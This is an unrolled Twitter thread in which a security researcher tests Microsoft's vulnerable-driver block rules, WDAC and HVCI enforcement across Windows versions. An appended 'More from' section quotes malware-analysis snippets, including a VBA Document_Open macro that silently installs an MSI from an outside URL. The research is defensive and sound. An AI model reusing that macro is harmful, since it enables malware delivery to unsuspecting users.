Will Dormann is on Mastodon Profile picture
Sep 16, 2022 41 tweets 22 min read Read on X
The Microsoft recommended driver block rules page states that the driver block list "is applied to" HVCI-enabled devices.
Yet here is an HVCI-enabled system, and one of the drivers in the block list (WinRing0) is happily loaded.
I don't believe the docs.
docs.microsoft.com/en-us/windows/… Screenshot of HVCI-enabled ...
The GUI for "Microsoft Vulnerable Driver Blocklist" isn't present unless you're running the "Dev Channel" Insider Preview for Windows 11.
Yet the documentation for Microsoft recommended driver block rules says that it gets applied to HVCI-enabled Win10.
Applies to:  Windows 10 Win...
If I *MANUALLY* apply the driver blocklist using WDAC in enforcing mode, the driver is blocked.
But the documentation for the Microsoft recommended driver block rules assures me that it is applied to Windows 10 HVCI-enabled machines.
Why do I have trust issues, I wonder... Successful blocking of driv...
Two things seem to be at play here:
1) Windows never seems to get updates to the recommended driver block rules. Win10 always stays at 10.0.19014.0, and Win11 stays at 10.0.21250.0.
2) Insider preview w/ updated block list still doesn't actually block.
🤦‍♂️
Even with the bleeding-edge Insider Preview Dev build that has a nice "Microsoft Vulnerable Driver Blocklist" thing in the GUI doesn't actually block a driver in the Microsoft recommended driver block rules.
Both without HVCI, and with HVCI enabled.
What am I missing here?? Microsoft Vulnerable Blockl...Microsoft Vulnerable Blockl...
Doing a Google search to find a CVE for a driver name in the Microsoft recommended driver block rules led me to a vulnerable driver that is *NOT* in the list.
So therefore my driver blocking experiments have been invalid. 🤦‍♂️
Does anybody have a good known blocked driver example? Hashes of WinRing0x64.sys f...Description for CVE-2020-14...
Courtesy of github.com/eclypsium/Scre… , I've found that the MSI BS_HWMIO64_W10.sys driver is a good canary test for the Microsoft recommended driver block rules, especially since it's in there via version, and not by hash.
It's AUTOMATICALLY blocked on a system with HVCI enabled.👍 Vulnerable BS_HWMIO64_W10.S...
If HVCI is not enabled, there is NO automatic blocking of the known vulnerable driver on the Microsoft recommended driver block rules list. BW_HWMIO64_W10.sys is loade...
What's concerning is that regardless of how many Windows Updates happen, the code integrity policy on a Win10 machine is at least 2 years old.
That is, while HVCI-enabled systems will get the benefit of automatic driver blocking, the list never updates, so will be quite old! Windows Update happens, but...
The CIP on the current Windows 10 version always stays at 10.0.19014.0 regardless of Windows Updates happening, and Windows 11 always stays at 10.0.21250.0.
It's nice that the Microsoft recommended driver block rules is updated over time online, Windows doesn't see those updates. CIP on https://learn.micros...The CIP used by Windows 10 ...
The initial commit of the Microsoft recommended driver block rules web page on Github is from October 16, 2020, and it's 10.0.19565.0.
github.com/MicrosoftDocs/…
What you get with Win10 21H2 + add all Windows Updates is still 10.0.19014.0. So I can't even tell how old that list is. Initial commit of Microsoft...
It appears that this new (not really out in the wild yet) "Microsoft Vulnerable Driver Blocklist" option handles the case where HVCI is NOT enabled. The driver is blocked, without having to manually sift through and merge / apply WDAC hell. Windows Insider Preview Dev...
What's a touch misleading is that "Microsoft Vulnerable Driver Blocklist" is listed under "Core isolation", which "use virtualization-based security".
Which implies that enabling it will enable HVCI and/or will only be possible with HVCI.
This is wrong. It doesn't really fit here Microsoft Vulnerable Driver...
The Microsoft recommended driver block rules automatically used by HVCI are provided by:
C:\Windows\System32\CodeIntegrity\driversipolicy.p7b
With a fully-patched latest (21H2) Windows 10 OS, this file was last modified on Dec 12, 2019.
YOU don't get updates to this file. Duh? driversipolicy.p7b, which p..."Microsoft adds the vu...
I'll just manually install the Microsoft recommended driver block rules using the XML available at learn.microsoft.com/en-us/windows/… , right?
Well, if you're using "script" deployment, be aware of:
1) This Policy has an "audit" section it it. If you don't remove it, nothing's blocked.
... remove "audit" se...
2) Starting with Windows 10 1903, policies are deployed as {GUID}.cip for multi-format policy files.
This MS driver block list? NOT a multi-format policy file!
Workaround:
You can deploy as {PolicyTypeID_GUID}.cip
EXCEPT:
{D2BDA982-CCF6-4344-AC5B-0B44427B6816} is special. Change! Deploying policies for Wind...Change {D2BDA982-CCF6-4344-...
If the planets are in alignment, you can compile and install this policy (with the new GUID), and it will be fully applied during the next reboot.
After Windows comes up, you should notice that drivers in the *CURRENT* Microsoft recommended driver block rules will be blocked. Successful PowerShell compi...Mention of blocked driver i...
Ironically, using the not-recommended WDAC method for blocking drivers gets you the current list. And if the system happens to have HVCI enabled, WDAC will take advantage of HVCI for enforcement.
If you use the "Turn HVCI on" method, you'll get a 3-year old list with Win 10. 🤷‍♂️ Blocking vulnerable drivers...
How about Windows Server 2016?
The "Microsoft recommended driver block rules" doc says it applies to it. We get protections if HVCI is enabled, right?
No, I see no evidence that any drivers are explicitly blocked. WHQL is enforced, but that's unrelated to the driver blocklist. Microsoft recommended drive...Known vulnerable driver is ...The blocked vsock.sys is un...
What if I've been paying attention to things, and I know that I need to *manually* apply the latest Microsoft recommended driver block rules, which "applies to" Windows Server 2016? That should just work, right?

You clearly haven't been paying CLOSE attention, have you? 😀 ConvertFrom-CIPolicy -xmlFi...
If you don't trust the Microsoft recommended driver block rules to not break things, or if you're making your own rules, rather than getting rid of the "Audit Mode" option, you can change it to "Boot Audit On Failure" (case sensitive!).
Instead of non-booting Windows, audit logs.     <Rule>       <Option>En...Windows would have failed t...
But please don't rely on "Boot Audit On Failure" if you're on Windows Server 2016 and you have a bad WDAC driver policy (e.g. blocks critical drivers).
In my testing, that option will simply cause Windows to fail to boot in a different way, which isn't really an improvement. Windows fails to boot when ...If "Boot Audit On Fail...
In both cases, the fix is easy.
Select the "Startup Settings" option in Advanced options.
Select "Disable Driver Signature Enforcement" and once back in Windows, undo what you did.
So yeah, Windows isn't bricked. But I feel like it takes a certain masochism to choose WDAC. 😫 Advanced options -> Startup...Startup Settings -> Restart"Disable Driver Signat...
How might one get a "bad" WDAC driver policy installed? Imagine this:
- You use New-CIPolicy to create a "deny" policy using a known-bad driver.
- You remove the "Audit Mode" option, because you're feeling lucky.

Congrats! You now told Windows that it cannot load ANY driver. $DriverFiles = Get-SystemDr...Windows 10 Automatic repair...
Why does such a seemingly innocuous action have such catastrophic consequences?
Well, WDAC is an ALLOW list capability.
So if you tell WDAC to "Just block this one driver", you'll have accomplished telling Windows to not allow anything, including explicitly blocking that driver.
For people familiar with how WDAC works, this may be a "well, duh!" moment.
But I'm not one of those people, and this thread was my journey along the way.
And I bet there are other sysadmins there that are also not familiar with WDAC and its idiosyncrasies.
So maybe this'll help.
How about Windows Server 2019?
Surely this Microsoft recommended driver block rules thing that "Applies to" "Windows Server 2016 or above" comes into play, right?
Well, sorta.
1) The driver blocklist on fully-patched Server 2019 is from 2018 contains only TWO blocked drivers.
...     <Deny ID="ID_DENY_...If HVCI is off, then neithe...If HVCI is on, neither of t...
2) Even if you wanted to manually install the "Microsoft recommended driver block rules" policy, it seems to silently fail to do anything on Windows Server 2019.
At least Server 2016 had the courtesy to tell you that it doesn't understand the policy XML file. Windows Server 2016 won't i...Windows Server 2019 Imports...Policy compiled and install...
We're all having fun here, right?
Why stop now?
Microsoft Attack Surface Reduction (ASR) can also block drivers and the lists are in sync with the HVCI-enforced driver block list.
Except... in my testing it doesn't block a thing.
Child process blocking: ✅
Vulnerable drivers: ❌ ASR blocking of child proce...SwiftOnSecurity @SwiftOnSec...Block abuse of exploited vu...
Or if you'd prefer to see a screen recording as proof:
The "Block all Office applications from creating child processes" ASR rule clearly works fine.
The "Block abuse of exploited vulnerable signed drivers" ASR rule does nothing to block a driver that's known to be vulnerable.
Regarding Server 2016/2019 incompatibility with the list:
1) Server 2016 doesn't understand the MaximumFileVersion= attribute, so those will need to be removed.
2) On September 19, Microsoft changed PolicyTypeId to {A244370E-44C9-4C06-B551-F6016E563076}.
github.com/MicrosoftDocs/…
My earlier troubles in this thread with Windows Server were related to the fact that I was still using an XML file that was a week old. Maybe somebody at MS is monitoring this thread? 😀 ConvertFrom-CIPolicy -xmlFi...... and you're good to go. ...
All I want to do is learn about WDAC.
But when the official documentation seems, well, wrong...
Why do I get the impression that there aren't a lot of people doing this in the real world? 🤔 In addition to the steps ou...Official sequence:  $MountP...My (unofficial) sequence  $...
To be fair, this EFI stuff may not even matter in my particular case, as it appears that *SIGNED* WDAC policies are a whole other animal, beyond what I'm looking to accomplish.
learn.microsoft.com/en-us/windows/…
I just would prefer documentation to be not obviously wrong.
Too much to ask?? Deploying signed policies I...
Instead of "In addition to the steps outlined above, the binary policy file must also be copied to the device's EFI partition."
more user-friendly would be:
"If you have implemented a signed WDAC policy, you must perform these steps for EFI. Otherwise, these steps are irrelevant" Deploying signed policies I...
Based on my experience in this thread, perhaps there is a need for a SIMPLE PowerShell script that can take a WDAC policy of any format, and apply it to any supported Windows system.
Does this sound useful to anybody, or is nobody using WDAC in the real world with PowerShell? Windows Server 2016:  PS C:...Windows 10 21H2:  PS C:\tmp...
As requested: github.com/wdormann/apply…
For people not too familiar with WDAC, this PowerShell script can help you easily apply WDAC rules, such as the Microsoft recommended driver block rules.
For those already using WDAC, please stick to whatever you're already doing. PS C:\tmp> .\applywdac.ps1 ...PS C:\tmp> .\applywdac.ps1 ...
I've updated this script to have an -auto option, which will automatically download the newly/available precompiled driver block list from Microsoft and install it, in either the default audit mode, or enforcing.
Easier than requiring your own XML file. 2 Administrator: Windows Po...
FTR, we "all" know by now that the Microsoft recommended driver block rules isn't pushed out to Windows endpoints. The Windows 10 list is from 2019.
What about Windows Server 2019? You get TWO blocked drivers: capcom.sys and bandai.sys
Server 2016: ZERO. There is no list.
Since we now know that this statement has never been true, can we maybe update this page to reflect reality? @msftsecurity
microsoft.com/security/blog/… The vulnerable driver block...
Or maybe this blog post from 2020 advertising Secured Core PCs. It's promoting a feature that doesn't exist.
microsoft.com/security/blog/… Gaining kernel privileges b...In our research, we identif...

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Will Dormann is on Mastodon

Will Dormann is on Mastodon Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @wdormann

Aug 28, 2023
A note about what's going on here.
1) Word will render HTML (including MHT) content regardless of what comes before it. Plain text plays nicest.
2) When MHT content includes a <link rel=Edit-Time-Data> object that points to an undocumented ActiveMime blob, there's your Macro!
Note that the normal MotW-enabled Macro protections remain in place. (Macros on files from the internet aren't allowed these days)
The original MHT document has two obvious obfuscations.
1) The Edit-Time-Data link is URL encoded.
2) Its target is littered with extra spaces.
🤷‍♂️
Edit-Time-Data link from MHT content. %63%58%59%74%4C%76%6D%66%55%5F%66%69%6C%65%73%2F%69%6D%61%67%65%33%38%32%30%31%31%34%2E%6A%70%67 decodes to: cXYtLvmfU_files/image3820114.jpg
cXYtLvmfU_files/image3820114.jpg MIME section. Lots of extra spaces added.
While oletools oleid will detect presence of Macros in the MHT content, olevba seems to fall short of extracting it.
However, you can extract the undocumented ActiveMime blob with binwalk.
And from that extracted file, you can successfully extract the VBA code contained in it.


oleid 0723Request.pdf output VBA Macros: Yes
olevba 0723Request.pdf Not very useful output
oleid 32 (file extracted using binwalk) VBA Macros: Yes, suspicious
olevba binwalkoutput:  Private Sub Document_Open() On Error Resume Next Dim base As Object Set base = CreateObject("WindowsInstaller.Installer") base.UILevel = 2 rtg = "https://web365metrics.com/files/69fbd341bcf4f734fd47f72710021ae6839/MicrosoftOffiice.Hub.msi" base.InstallProduct rtg End Sub
Read 7 tweets
Jul 21, 2023
This complex CVE-2023-36884 exploit chain that some of us are looking at...
I can't tell if it's a decoy, or is nonsense written by ChatGPT, or triggers a new vulnerability but is otherwise broken, or has a an 0day exploit that is not reached, or is the real deal.
Thoughts? 🤔
I've not ruled out "Real", but for the life of me I can't get the exploit chain to work in its entirety.
Between what BlackBerry and Volexity describe, there are both parts missing, a bit of hand-waving, and some parts that simply seem broken.
BUT, let's look at the end parts...
1) By redirecting through individual HTML pages in a CHM, we can bypass the restriction on not running JavaScript. 🤔
2) By opening a .URL that targets a file inside of a ZIP via WebDav, we don't get any warnings (MotW doesn't matter). 🤔
Why doesn't the ITW exploit work for me? Flowchart of last stages of CVE-2023-36884
Read 24 tweets
Mar 30, 2023
Anybody poking at this 3CX thing, check out news.sophos.com/en-us/2023/03/…

Value-added ffmpeg.dll has code added to DllMain() that causes d3dcompiler_47.dll to be loaded, and decrypted payload is decoded from there.
Wide string "AVMonitorRefreshEvent" is *not* in legit ffmpeg.dll Process monitor call stack of d3dcompiler_47.dll being loadecall in DllMain to loadMaliciousLibrary is not in the normalin loadMaliciousLibrary() function:  v0 = 1;   EventW = Crea
Similarly, the malicious ffmpeg.dll will have the wide string "d3dcompiler_47.dll" in it, whereas the legit ffmpeg.dll does not.
Because, why should it? 😀 R:\wildcard\3cx>strings ffmpeg.dll | findstr /c:d3dcompiler_
The d3dcompiler_47.dll has a "valid" signature from Microsoft, but has added value by way of using CVE-2013-3900.
Despite being 10 years old, Microsoft has left the fix for this optional, so by default we live in a world where this file is completely legit.
But we know better...                          [Issuer]                           R:\wildcard\3cx\installed\3CXDesktopApp-407\app>AnalyzePESig
Read 5 tweets
Mar 29, 2023
Speaking of avoiding Outlook...
Has anybody else noticed trouble recently with M365's Oauth2 authentication for SMTP, with Thunderbird at least?
IMAP seems fine, FWIW.
Login to server smtp.office365.com with username <emailaddress> failed. Error message: Login to server smtp.office365.com with usern
This may be Thunderbird-specific, as Apple Mail seems to work fine. Apple mail screenshot of mail received via M365 SMTP
Huh, so M365 mail appears to have Authenticated SMTP disabled.
Thunderbird error console to the rescue, it points to aka.ms/smtp_auth_disa… for a fix.
This seems like a recent change by MS that it throwing off Thunderbird, but not Apple Mail. Default M365 options for mail. "Authenticated SMTP"Command failed: 535 Authentication unsuccessful, SmtpClientA
Read 5 tweets
Mar 15, 2023
Folks poking at CVE-2023-23397 ...
I can't seem to send any kind of calendar invite that's generated by MsgKit.
Microsoft Outlook reports:
Cannot send this meeting request.

You don't need an actual Exchange server to send such an invite do you?? Microsoft Outlook Cannot se...
And just to clarify, even just taking the simplest sort of calendar invite MSG from MsgKit and attempting to save it as anything else (.ics, .vcs) w/ Outlook results in the same sort of error message. No SMTP / Exchange transport involved.
/me clicks "No" and waits for a solution Cannot send this meeting re...Was this information helpfu...
My understanding at this point:
- MsgKit appointments don't seem to be sendable with Outlook.
- When talking to an Exchange box, Outlook will allow "rich" invites that can trigger CVE-2023-23397
- If I request the invite email via IMAP, Exchange interprets it into VCF, so no fun! Python Responder results af...
Read 12 tweets
Mar 7, 2023
The Microsoft update for CVE-2023-21716 was updated to suggest configuring Outlook to read mail in plain text as opposed to "Rich Text".
But despite calling it "Rich Text", Outlook doesn't use RTF for emails. It's TNEF.
Anyone know why this advice was added?
Spaghetti + Wall? Workarounds Use Microsoft O...
Ok, yeah, thx to @jduck TNEF does indeed include compressed RTF data in it.
Now about that "Use Microsoft Outlook to reduce the risk of users opening RTF Files" part... 🤔 Screenshot of RTF file extr...
Now, let's think about the consequences of choosing to "fix" a vulnerability in a way that the software still crashes, but presumably a bit more safely.
Our fully-patched (with Feb's updates) Outlook crashes on "previewing" an email received from the internet.
THIS_IS_FINE.PNG
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(